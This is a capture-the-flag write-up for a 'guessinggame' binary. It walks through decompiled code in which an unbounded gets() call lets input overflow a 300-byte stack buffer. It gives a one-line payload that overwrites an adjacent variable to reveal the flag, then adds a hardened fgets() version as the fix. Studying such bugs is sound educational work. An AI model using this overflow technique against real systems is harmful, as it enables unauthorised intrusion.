# guessinggame

No one seems to be able to guess my favorite animal... Can you?

```
nc chal.pctf.competitivecyber.club 9999
```

## Solution

I opened the binary in IDA, and here is the pseudocode it generated that I looked at.

**main()**

```c
int __cdecl main(int argc, const char **argv, const char **envp)
{
  puts("Hello there, friend! Can you guess my favorite animal?");
  check("Hello there, friend! Can you guess my favorite animal?", argv);
  return 0;
}
```


**check()**

```c
int check()
{
  int result; // eax
  char s2[8]; // [rsp+8h] [rbp-138h] BYREF
  char s1[300]; // [rsp+10h] [rbp-130h] BYREF
  int v3; // [rsp+13Ch] [rbp-4h]

  strcpy(s2, "Giraffe");
  v3 = 0;
  printf("Input guess: ");
  gets(s1);
  if ( !strcmp(s1, s2) )
    result = puts("That's not my favorite animal... I promise!");
  else
    result = puts("ERRR! Wrong!");
  if ( v3 )
  {
    puts("I wasn't able to trick you...");
    return outputFlag();
  }
  return result;
}
```


Analyzing this function, we can see that `v3` needs to be set to 1 for us to get the flag (the `if ( v3 )` check passes for any non-zero value). There is no way for us to set it directly. However, the input is read into `s1` with `gets()`, which does no bounds checking. `s1` is a 300-byte buffer at `rbp-0x130`, and `v3` sits right after it at `rbp-0x4`, exactly 0x12C (300) bytes later. So essentially, we can send a payload that has 300 bytes of data with `\x01` added to it.

```python
payload = f"{'A' * 0x12C}\x01"
```


If we send this payload, it overflows `s1` and sets `v3` to 1, which outputs the flag:

```
PCTF{1_l0v3_g1raff35_85036769}
```
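
The root cause is the unbounded `gets(s1)` in `check()`. The following is an added example, not part of the original writeup or the challenge source, showing the same comparison with a bounded read that rejects over-long lines; `check_hardened`, `run_case`, `guess_result` and `GUESS_MAX` are hypothetical names, and the input is constructed in a temporary file.

```c
#include <stdio.h>
#include <string.h>

#define GUESS_MAX 300   /* same size as s1 in the decompiled check() */

/* matched: guess equals the secret; truncated: line did not fit; stored: bytes kept */
struct guess_result { int matched, truncated; size_t stored; };

/* check() with gets() replaced by a bounded read (added example). */
struct guess_result check_hardened(FILE *in)
{
    struct guess_result r = {0, 0, 0};
    char s1[GUESS_MAX];
    int c, extra = 0;
    if (fgets(s1, sizeof s1, in) == NULL)
        return r;                    /* EOF or read error: nothing to compare */
    r.stored = strcspn(s1, "\n");
    if (s1[r.stored] == '\n') {
        s1[r.stored] = '\0';         /* complete line: strip the newline */
    } else {
        while ((c = getc(in)) != '\n' && c != EOF)
            extra++;                 /* discard whatever did not fit in s1 */
        r.truncated = extra > 0;
    }
    r.matched = !r.truncated && strcmp(s1, "Giraffe") == 0;
    return r;
}

/* Constructed input: `pad` filler bytes, then `text`, then a newline. */
struct guess_result run_case(const char *text, size_t pad)
{
    struct guess_result r = {0, 0, 0};
    FILE *f = tmpfile();
    if (f == NULL)
        return r;
    for (size_t i = 0; i < pad; i++)
        fputc('A', f);
    fprintf(f, "%s\n", text);
    rewind(f);
    r = check_hardened(f);
    fclose(f);
    return r;
}

int main(void)
{
    struct guess_result r = run_case("\x01", GUESS_MAX);  /* 301-byte line */
    printf("stored=%zu truncated=%d\n", r.stored, r.truncated);
}
```

With `fgets()` the write into `s1` can never exceed `sizeof s1`, so adjacent stack variables such as `v3` are out of reach of the input. Building with `-fstack-protector-strong` and `_FORTIFY_SOURCE` adds a second layer, but removing `gets()` is the actual fix.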